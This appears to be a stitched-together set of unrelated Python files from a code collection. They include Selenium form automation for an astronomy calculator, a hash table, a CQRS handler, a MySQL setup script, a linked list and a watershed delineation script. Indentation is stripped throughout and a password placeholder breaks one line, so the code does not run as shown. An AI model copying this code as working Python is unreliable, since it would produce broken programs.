if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# For Michelle and TReCS
def setDetectorPropertiesMichelle(driver, Mirror, Port, Wavefront):
#Set Mirror Coating
if "silver" in Mirror.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Mirror.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Instrument Port
if "side" in Port.lower():
driver.find_element_by_xpath("//input[@value='SIDE_LOOKING' and @name='IssPort']").click()
else:
driver.find_element_by_xpath("//input[@value='UP_LOOKING' and @name='IssPort']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesTReCS(driver, Cryostat, Filter, FPM, Grating, Wavelength):
logger = logging.getLogger('setOpticalPropertiesTReCS')
time.sleep(sleep)
# Set Cryostat
driver.find_element_by_xpath("//select[@name='WindowWheel']/option[@value='" + Cryostat + "']").click()
# Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
# Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Spectrum Central Wavelength
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesMichelle(driver, Filter, FPM, Grating, Wavelength, Polarimetry):
logger = logging.getLogger('setOpticalPropertiesMichelle')
time.sleep(sleep)
# Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
# Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Spectrum Central Wavelength
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
# Set Polarimetry
if "dis" in Polarimetry.lower():
driver.find_element_by_xpath("//input[@value='NO' and @name='polarimetry']").click()
else:
driver.find_element_by_xpath("//input[@value='YES' and @name='polarimetry']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesNIFS(driver, Filter, Grating, Wavelength):
logger = logging.getLogger('setOpticalPropertiesNIFS')
time.sleep(sleep)
# Set Filter
if "zj" in Filter.lower() or "z-j" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='ZJ_FILTER']").click()
elif "jh" in Filter.lower() or "j-h" in Filter.lower() or "hj" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='JH_FILTER']").click()
elif "hk" in Filter.lower() or "h-k" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='HK_FILTER']").click()
# Set Grating
if "z" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='Z']").click()
elif "short" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K_SHORT']").click()
elif "long" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K_LONG']").click()
elif "j" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='J']").click()
elif "h" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='H']").click()
else:
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K']").click()
# Set Spectrum Central Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesGNIRS(driver, Camera, FPM, Grating, Wavelength, Cross):
logger = logging.getLogger('setOpticalPropertiesGNIRS')
time.sleep(sleep)
# Set Camera
driver.find_element_by_xpath("//select[@name='PixelScale']/option[@value='" + Camera + "']").click()
# Set Focal Plane Mask
driver.find_element_by_xpath("//select[@name='SlitWidth']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Central Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
# Set Cross Dispersed
if "no" in Cross.lower():
driver.find_element_by_xpath("//select[@name='CrossDispersed']/option[@value='NO']").click()
else:
driver.find_element_by_xpath("//select[@name='CrossDispersed']/option[@value='SXD']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesGMOS(driver, Grating, Filter, CentralWavelength, FPU):
logger = logging.getLogger('setOpticalPropertiesGMOS')
time.sleep(sleep)
# Set Grating
driver.find_element_by_xpath("//select[@name='instrumentDisperser']/option[@value='" + Grating + "']").click()
# Set Filter
driver.find_element_by_xpath("//select[@name='instrumentFilter']/option[@value='" + Filter + "']").click()
# Set Central Wavelength
logger.debug('Setting central wavelength to %s nm', CentralWavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(CentralWavelength)
# Alternatively:
#cwav = driver.find_element_by_name("instrumentCentralWavelength")
#cwav.clear()
#cwav.send_keys(CentralWavelength)
# or:
#cwav = driver.find_element_by_xpath("//input[@name='instrumentCentralWavelength']")
#cwav.clear()
#cwav.send_keys(CentralWavelength)
# Set Focal Plane Unit
driver.find_element_by_xpath("//select[@name='instrumentFPMask']/option[@value='" + FPU + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-06
def setOpticalPropertiesGSAOI(driver, Filter):
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-10
def setOpticalPropertiesF2(driver, Filter, Disperser, FPM):
time.sleep(sleep)
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#Set Disperser
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Disperser + "']").click()
#Set FPM
driver.find_element_by_xpath("//select[@name='FPUnit']/option[@value='" + FPM + "']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesNIRI(driver, Camera, Filter, Disperser, FPM):
time.sleep(sleep)
#Set Camera
driver.find_element_by_xpath("//select[@name='Camera']/option[@value='" + Camera + "']").click()
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#Set Disperser
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Disperser + "']").click()
#Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
#---------------------------------------------------------------------------------------------------
def setAltairProperties(driver, Seperation, Brightness, FieldLens, Mode):
#Set AO Guide Star Seperation
if type(Seperation) is float:
Seperation = str(Seperation)
driver.find_element_by_name("guideSep").clear()
driver.find_element_by_name("guideSep").send_keys(Seperation)
#Set Guide Star Brightness (R-Band)
if type(Brightness) is float:
Brightness = str(Brightness)
driver.find_element_by_name("guideMag").clear()
driver.find_element_by_name("guideMag").send_keys(Brightness)
#Set Field Lens
driver.find_element_by_xpath("//input[@value='" + FieldLens.upper() + "' and @name='FieldLens']").click()
#Set Altair Mode
if "ngs" in Mode.lower() or "natural" in Mode.lower():
driver.find_element_by_xpath("//input[@value='NGS' and @name='GuideStarType']").click()
else:
driver.find_element_by_xpath("//input[@value='LGS' and @name='GuideStarType']").click()
#---------------------------------------------------------------------------------------------------
def setObservingConditions(driver, ImageQuality, CloudCover, WaterVapour, SkyBackground, AirMass):
#set Image Quality
if ImageQuality == 20:
Value = "PERCENT_20"
elif ImageQuality == 70:
Value = "PERCENT_70"
elif ImageQuality == 85:
Value = "PERCENT_85"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='ImageQuality' and @value='" + Value + "']").click()
#Set Cloud Cover
if CloudCover == 50:
Value = "PERCENT_50"
elif CloudCover == 70:
Value = "PERCENT_70"
elif CloudCover == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='CloudCover' and @value='" + Value + "']").click()
#Set Water Vapour
if WaterVapour == 20:
Value = "PERCENT_20"
elif WaterVapour == 50:
Value = "PERCENT_50"
elif WaterVapour == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='WaterVapor' and @value='" + Value + "']").click()
#Set Sky Background
if SkyBackground == 20:
Value = "PERCENT_20"
elif SkyBackground == 50:
Value = "PERCENT_50"
elif SkyBackground == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
#If SkyBackground is set to 0, don't try to set it
if not SkyBackground == 0:
driver.find_element_by_xpath("//input[@name='SkyBackground' and @value='" + Value + "']").click()
#Set Air Mass
if type(AirMass) is int or type(AirMass) is float:
AirMass = str(AirMass)
driver.find_element_by_xpath("//input[@name='Airmass' and @value='" + AirMass + "']").click()
#---------------------------------------------------------------------------------------------------
# Calculation method for Michelle and TReCS
def setCalculationMethodMichelle(driver, ResultMethod, Value1, Fraction):
#Set Fraction to a string
Fraction = str(Fraction)
Value1 = str(Value1)
#Set Results Method, Total Integration or S/N Ratio
if "ratio" in ResultMethod.lower():
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Value1)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
#Choose Total Integration Time
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
#---------------------------------------------------------------------------------------------------
def setCalculationMethod(driver, ResultMethod, Value1, Time, Fraction, Choose=True):
# For instruments w/o coadd option
#Set Fraction to a string
Fraction = str(Fraction)
Value1 = str(Value1)
#Set the Results Method, Total Integration or S/N ratio
if "ratio" in ResultMethod.lower():
if Choose:
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("numExpA").clear()
driver.find_element_by_name("numExpA").send_keys(Value1)
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Time)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("expTimeC").clear()
driver.find_element_by_name("expTimeC").send_keys(Time)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
# ---------------------------------------------------------------------------------------------------
def setCalculationMethodCoadd(driver, ResultMethod, Value1, Ncoadd, Time, Fraction, Choose=True):
# For instruments with a coadd option
# Set Fraction to a string
Fraction = str(Fraction)
Ncoadd = str(Ncoadd)
Value1 = str(Value1)
# Set the Results Method, Total Integration or S/N ratio
if "ratio" in ResultMethod.lower():
if Choose:
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("numExpA").clear()
driver.find_element_by_name("numExpA").send_keys(Value1)
driver.find_element_by_name("numCoaddsA").clear()
driver.find_element_by_name("numCoaddsA").send_keys(Ncoadd)
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Time)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("numCoaddsC").clear()
driver.find_element_by_name("numCoaddsC").send_keys(Ncoadd)
driver.find_element_by_name("expTimeC").clear()
driver.find_element_by_name("expTimeC").send_keys(Time)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
#---------------------------------------------------------------------------------------------------
# Slit Length is only for user defined aperture
# If using optimum aperture, only pass 3 arguments (driver,Type,Times)
# Used for GMOS, Michelle and TReCS
def setAnalysisMethodGMOS(driver, Type, Times, SlitLength=0):
if type(SlitLength) is float:
SlitLength = str(SlitLength)
if type(Times) is float:
Times = str(Times)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
driver.find_element_by_xpath("//input[@value='autoAper' and @name='analysisMethod']").click()
driver.find_element_by_name("autoSkyAper").clear()
driver.find_element_by_name("autoSkyAper").send_keys(Times)
else:
driver.find_element_by_xpath("//input[@value='userAper' and @name='analysisMethod']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(SlitLength)
driver.find_element_by_name("userSkyAper").clear()
driver.find_element_by_name("userSkyAper").send_keys(Times)
#---------------------------------------------------------------------------------------------------
# Analysis Method procedure for most instruments other than GMOS
def setAnalysisMethod(driver, Type, Slitlength=0):
if type(Slitlength) is float:
Slitlength = str(Slitlength)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
#Set for Optimum S/N Ratio
driver.find_element_by_xpath("//input[@value='autoAper' and @name='aperType']").click()
else:
#Set for Apeture of diameter( slit length) = X
driver.find_element_by_xpath("//input[@value='userAper' and @name='aperType']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(Slitlength)
# ---------------------------------------------------------------------------------------------------
# Analysis Method procedure for most instruments other than GMOS
def setAnalysisMethodGSAOI(driver, Type, Offset=5.0, largeSkyOffset=0, aperDiam=2.0):
if type(Offset) is float:
Offset = str(Offset)
if type(largeSkyOffset) is int:
largeSkyOffset = str(largeSkyOffset)
if type(aperDiam) is float:
aperDiam = str(aperDiam)
driver.find_element_by_name("offset").clear()
driver.find_element_by_name("offset").send_keys(Offset)
driver.find_element_by_name("largeSkyOffset").clear()
driver.find_element_by_name("largeSkyOffset").send_keys(largeSkyOffset)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
# Set for Optimum S/N Ratio
driver.find_element_by_xpath("//input[@value='autoAper']").click()
else:
# Set for Apeture of diameter( slit length) = X
driver.find_element_by_xpath("//input[@value='userAper' and @name='aperType']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(aperDiam)
# ---------------------------------------------------------------------------------------------------
def setIFUSpectroscopy(driver, Type, Offset1, Offset2=0):
#Change Offsets to strings
if type(Offset1) is float:
Offset1 = str(Offset1)
if type(Offset2) is float:
Offset2 = str(Offset2)
#Choose the type
if "sum" in Type.lower():
driver.find_element_by_xpath("//input[@value='summedIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuNumX").clear()
driver.find_element_by_name("ifuNumX").send_keys(Offset1)
driver.find_element_by_name("ifuNumY").clear()
driver.find_element_by_name("ifuNumY").send_keys(Offset2)
elif "multi" in Type.lower():
#Choose Multiple IFU elements
driver.find_element_by_xpath("//input[@value='radialIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuMinOffset").clear()
driver.find_element_by_name("ifuMinOffset").send_keys(Offset1)
driver.find_element_by_name("ifuMaxOffset").clear()
driver.find_element_by_name("ifuMaxOffset").send_keys(Offset2)
else:
#Choose individual IFU element
driver.find_element_by_xpath("//input[@value='singleIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuOffset").clear()
driver.find_element_by_name("ifuOffset").send_keys(Offset1)
#---------------------------------------------------------------------------------------------------
def calculate(driver):
#Click Calculate button
driver.find_element_by_xpath("//input[@value='Calculate' and @type='submit']").click()
#---------------------------------------------------------------------------------------------------
def extractData(driver, Type, TestNumber, Instrument, Testing, Cross=False):
logger = logging.getLogger('extractData')
# Turn TestNumber into a str
if type(TestNumber) is int:
TestNumber = str(TestNumber)
# Check if Folders exist to save to, else create them
path = GetPath(Instrument, Testing)
if not os.path.exists(path):
os.mkdir(path)
FileLocation = path + '/Test' + TestNumber
# If using GNIRS Cross-Dispersed, no need to check Single Exposure S/N
if Cross:
FileList = ("signal spectrum", "background spectrum", "Final")
else:
FileList = ("signal spectrum", "background spectrum", "Single Exposure", "Final")
# Generate list of all open windows:
windowsList = driver.window_handles
# Switch to results window:
driver.switch_to.window(windowsList[1])
# Imaging
if "imag" in Type.lower():
pass
# Spectroscopy
else:
for fileToSave in FileList:
logger.debug('fileToSave = %s', fileToSave)
fileObject = driver.find_element_by_partial_link_text(fileToSave)
fileLink = fileObject.get_attribute("href")
logger.debug('fileLink = %s', fileLink)
# Open the file and write to output
u = urlopen(fileLink)
localFile = open(FileLocation + '-' + fileToSave.replace(' ','') + '.dat', 'wb')
localFile.write(u.read())
localFile.close()
pass
# Save the results page
pageData = driver.page_source
localFile = open(FileLocation + '-output.html', 'w')
localFile.write(pageData)
localFile.close()
#if not Archiving:
# compareData(driver,Type,TestNumber,Instrument,Cross)
#---------------------------------------------------------------------------------------------------
def ConfigureLogging(logfile=None, filelevel='INFO', screenlevel='INFO'):
logger = logging.getLogger()
# DEBUG Detailed information, typically of interest only whendiagnosing problems.
# INFO Confirmation that things are working as expected.
# WARNING An indication that something unexpected happened, orindicative of some problem in the near future.
# ERROR Due to a more serious problem, the software has notbeen able to perform some function.
# CRITICAL A serious error, indicating that the program itself maybe unable to continue running.
# set minimum threshold level for logger:
logger.setLevel(logging.DEBUG)
# create formatter and add it to the handlers:
#formatter = logging.Formatter('%(asctime)s %(name)-10s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
if logfile: # create file handler:
logfilehandler = logging.FileHandler(logfile)
if filelevel.upper() == 'DEBUG':
logfilehandler.setLevel(logging.DEBUG)
elif filelevel.upper() == 'INFO':
logfilehandler.setLevel(logging.INFO)
elif filelevel.upper() == 'WARNING':
logfilehandler.setLevel(logging.WARNING)
elif filelevel.upper() == 'ERROR':
logfilehandler.setLevel(logging.ERROR)
elif filelevel.upper() == 'CRITICAL':
logfilehandler.setLevel(logging.CRITICAL)
else:
print ('ERROR: Unknown log error level')
logfilehandler.setLevel(logging.INFO)
logfilehandler.setFormatter(formatter)
logger.addHandler(logfilehandler)
# create console screen log handler:
consoleloghandler = logging.StreamHandler()
if screenlevel.upper() == 'DEBUG':
consoleloghandler.setLevel(logging.DEBUG)
elif screenlevel.upper() == 'INFO':
consoleloghandler.setLevel(logging.INFO)
elif screenlevel.upper() == 'WARNING':
consoleloghandler.setLevel(logging.WARNING)
elif screenlevel.upper() == 'ERROR':
consoleloghandler.setLevel(logging.ERROR)
elif screenlevel.upper() == 'CRITICAL':
consoleloghandler.setLevel(logging.CRITICAL)
else:
print ('ERROR: Unknown log error level')
consoleloghandler.setLevel(logging.INFO)
consoleloghandler.setFormatter(formatter)
logger.addHandler(consoleloghandler)
return(logger)
#---------------------------------------------------------------------------------------------------
| 2.125
| 2
|
source-code-from-author-book/Listings-for-Second-Edition/listing_5_8.py
|
robrac/algorithms-exercises-with-python
| 0
|
12777659
|
label=hashtablecodesearch,index={get,\_\_getitem\_\_,\_\_setitem\_\_},float=htb]
def get(self,key):
startslot = self.hashfunction(key,len(self.slots))
data = None
stop = False
found = False
position = startslot
while self.slots[position] != None and \
not found and not stop:
if self.slots[position] == key:
found = True
data = self.data[position]
else:
position=self.rehash(position,len(self.slots))
if position == startslot:
stop = True
return data
def __getitem__(self,key):
return self.get(key)
def __setitem__(self,key,data):
self.put(key,data)
| 2.765625
| 3
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListQueryHandler.py
|
PythonDataIntegrator/pythondataintegrator
| 14
|
12777660
|
from injector import inject
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListMapping import GetDataOperationJobExecutionLogListMapping
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListQuery import GetDataOperationJobExecutionLogListQuery
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListResponse import GetDataOperationJobExecutionLogListResponse
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListSpecifications import GetDataOperationJobExecutionLogListSpecifications
from infrastructure.cqrs.IQueryHandler import IQueryHandler
from infrastructure.data.RepositoryProvider import RepositoryProvider
from infrastructure.dependency.scopes import IScoped
class GetDataOperationJobExecutionLogListQueryHandler(IQueryHandler[GetDataOperationJobExecutionLogListQuery], IScoped):
@inject
def __init__(self,
repository_provider: RepositoryProvider,
specifications: GetDataOperationJobExecutionLogListSpecifications):
self.repository_provider = repository_provider
self.specifications = specifications
def handle(self, query: GetDataOperationJobExecutionLogListQuery) -> GetDataOperationJobExecutionLogListResponse:
result = GetDataOperationJobExecutionLogListResponse()
data_query = self.specifications.specify(query=query)
result.Data = GetDataOperationJobExecutionLogListMapping.to_dtos(data_query)
return result
| 2.03125
| 2
|
code/data_reader.py
|
matheusjohannaraujo/ML-Experiments_FuzzyClustering_ProbClassifiers
| 1
|
12777661
|
<reponame>matheusjohannaraujo/ML-Experiments_FuzzyClustering_ProbClassifiers<gh_stars>1-10
import pandas as pd
import parameters as params
import numpy as np
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from imblearn.over_sampling import SMOTE
class DataReader:
def __init__(self):
path = f'{params.DATA_BASE_PATH}{params.DATA_FILENAME}'
self.data = pd.read_csv(
path,
delim_whitespace=True
)
def get_y_labels(self, y):
temp = np.unique(y)
i = 0
for val in temp:
y[y==val] = i
i += 1
return np.array(y, dtype=int)
def get_data(self):
y = np.array(self.data.values[:, -1])
y = self.get_y_labels(y)
X = self.data.values[:, 1:-1]
# X = self.data.drop(columns=['class', 'sequence_name', 'pox', 'erl'])
# X = X.values
# X = self.scaled_data = StandardScaler().fit_transform(X)
return np.array(X, dtype=float), y
def get_oversampled_data(self, X, y):
sm = SMOTE(k_neighbors=3)
# Fit the model to generate the data.
X_new, y_new = sm.fit_resample(X, y)
return X_new, y_new
def get_preprocessed_data(self):
y = np.array(self.data.values[:, -1])
y = self.get_y_labels(y)
X = self.data.drop(columns=['class', 'sequence_name'])
# X_new, y_new = self.get_oversampled_data(X, y)
return X.values, y
| 2.40625
| 2
|
core/src/test/python/exception_test.py
|
11bluetree/weblogic-deploy-tooling
| 1
|
12777662
|
"""
Copyright (c) 2017, 2019, Oracle Corporation and/or its affiliates. All rights reserved.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""
import unittest
from wlsdeploy.exception import exception_helper
from wlsdeploy.exception.expection_types import ExceptionType
class ExceptionHelperTestCase(unittest.TestCase):
def testCreateException(self):
ex = exception_helper.create_exception(ExceptionType.CREATE, 'WLSDPLY-12400',
'createDomain', '-oracle_home')
self.assertNotEquals(ex, None)
return
| 2.1875
| 2
|
python/tuples_example.py
|
matheuskiser/pdx_code_guild
| 0
|
12777663
|
# Assigns a tuple of scores
scores = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
# Displays the highest and lowest value in the tuple
print "The lowest possible score is " + str(min(scores))
print "The highest possible score is " + str(max(scores))
# Goes through tuple and prints out values
for i in scores:
if i == 1:
print "A judge can give a gymnast " + str(i) + " point."
else:
print "A judge can give a gymnast " + str(i) + " points."
| 4.40625
| 4
|
setup.py
|
yetone/collipa
| 99
|
12777664
|
<gh_stars>10-100
# coding: utf-8
import re
import sys
import getopt
import MySQLdb
from pony.orm import db_session
from collipa import config
@db_session
def init_node():
from collipa.models import Node
if not Node.get(id=1):
Node(name=u'根节点', urlname='root',
description=u'一切的根源').save()
def convert(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def merge():
m = MySQLdb.connect(host=config.db_host, user=config.db_user,
passwd=config.db_<PASSWORD>, db=config.db_name)
c = m.cursor()
c.execute(r'show tables')
old_table_names = [x[0] for x in c]
try:
for old_table_name in old_table_names:
table_name = old_table_name.lower()
sql = r'RENAME TABLE %s TO %s' % (old_table_name, table_name)
print(sql)
c.execute(sql)
c.close()
m.commit()
m.close()
except Exception as e:
print(type(e).__name__)
print(e)
raise
def main(argv):
try:
opts, args = getopt.getopt(argv, "", ["install", "init",
"iwanttodropdatabase", 'merge'])
except getopt.GetoptError:
print("参数错误")
sys.exit(2)
for opt, val in opts:
if opt == '--merge':
merge()
print('merge 成功!')
if opt == "--init":
m = MySQLdb.connect(host=config.db_host, user=config.db_user,
passwd=config.db_pass)
c = m.cursor()
# create database
try:
c.execute("create database %s" % config.db_name)
c.execute("grant all privileges on %s.* to '%s'@'localhost' identified by '%s'" %
(config.db_name, config.db_user, config.db_pass))
c.execute("flush privileges")
c.close()
m.commit()
m.close()
except Exception:
pass
# create tables
from collipa.models import db
db.generate_mapping(create_tables=True)
init_node()
print("数据库表初始化成功")
if __name__ == "__main__":
main(sys.argv[1:])
| 2.25
| 2
|
Data Structures/LinkedList/Doubly Linked List/Insertion_at_front.py
|
chasesagar/Python-Programming
| 0
|
12777665
|
# Doubly Linked List
class Node:
def __init__(self,data):
self.data = data
self.next = None
self.prev = None
class DoublyLinkedList:
def __init__(self):
self.head = None
# Main insertion function
def Push(self,new_data):
new_node = Node(new_data) # 1 & 2: Allocate the Node & Put in the data
new_node.next = self.head # 3. Make next of new node as head
if self.head is not None: # 4. change prev of head node to new node
self.head.prev = new_node
self.head = new_node # 5. move the head to point to the new node
# Print Function for double linked list.
def PrintList(self):
temp = self.head
while(temp is not None):
print(temp.data,end=" ")
temp = temp.next
print('')
#code
if(__name__=="__main__"):
dlist = DoublyLinkedList()
arr = [8,2,3,1,7]
for i in arr:
dlist.Push(i)
dlist.PrintList()
| 4.28125
| 4
|
rwd_nhd/NHD_Rapid_Watershed_Delineation.py
|
WikiWatershed/RapidWatersheDelineation
| 8
|
12777666
|
<filename>rwd_nhd/NHD_Rapid_Watershed_Delineation.py
import sys
import os
import time
import subprocess
import gdal
import fiona
from NHD_RWD_Utilities import generate_moveoutletstostream_command, create_shape_from_point, \
extract_value_from_raster_point, extract_value_from_raster, get_gauge_watershed_command, get_watershed_attributes, \
purge, reproject_point
def Point_Watershed_Function(
longitude,
latitude,
snapping,
maximum_snap_distance,
pre_process_dir,
gage_watershed_raster,
gage_watershed_shapefile,
np,
taudem_dir,
mpi_dir,
output_dir):
overall_start_time = time.time()
start_time = overall_start_time
dir_main = os.path.join(str(pre_process_dir), 'Main_Watershed')
main_watershed = gage_watershed_shapefile
output_dir=os.path.join(dir_main,output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
os.chdir(dir_main)
infile_crs = []
with fiona.open(main_watershed + '.shp') as source:
projection = source.crs
infile_crs.append(projection)
os.chdir(output_dir)
log=open("log.txt","w")
log.write("Latitude: %s, Longitude %s\n" % (latitude,longitude) )
albers_y, albers_x = reproject_point(
(latitude, longitude),
# WGS 84 Latlong
from_epsg=4326,
# NAD83 / Conus Albers
to_epsg=5070)
# Create shape later when distance to stream is available
# create_shape_from_point((latitude, longitude), (albers_y, albers_x), "mypoint", infile_crs[0])
gage_watershed_rasterfile = os.path.join(dir_main, gage_watershed_raster)
# extract ID from gage watershed raster saves significant amount of time, that is polygon searching takes long
# amount of time however extract raster value from raster does not takes
fg = int(extract_value_from_raster_point(
gage_watershed_rasterfile, albers_x, albers_y))
ID = fg
print(ID)
internaldrain=False
if ID is None or ID < 1:
# This internal drain logic relies on the following data
# regions.tif file in Main_watershed folder that has an ID in it for the NHDPlus grid processing region
# RegionsID folders in Subwatershed_ALL that has the corresponding region flow direction file named region_IDp.tif
# The strategy is to use the regions.tif file to identify the region the point falls within, then delineate the watershed using the full tiff file for that region.
# There is no joining of upstream watersheds as this is applied only for points not handled by the preprocessed gage watersheds and these points do not have upstream watersheds
regionsfile = os.path.join(dir_main, "regions.tif")
ID = int(extract_value_from_raster_point(
regionsfile, albers_x, albers_y))
if ID is None or ID < 1:
raise Exception('Point located outside the watershed.')
internaldrain=True
if(internaldrain):
print("Using internally draining function.\nRegion " + str(ID))
dir_name = 'Region'
sub_file_name = "Region_"
subwatershed_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', dir_name + str(ID))
distance_stream = 0
else:
dir_name = 'Subwatershed'
sub_file_name = "subwatershed_"
subwatershed_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', dir_name + str(ID))
dist_file = sub_file_name + str(ID) + "dist.tif"
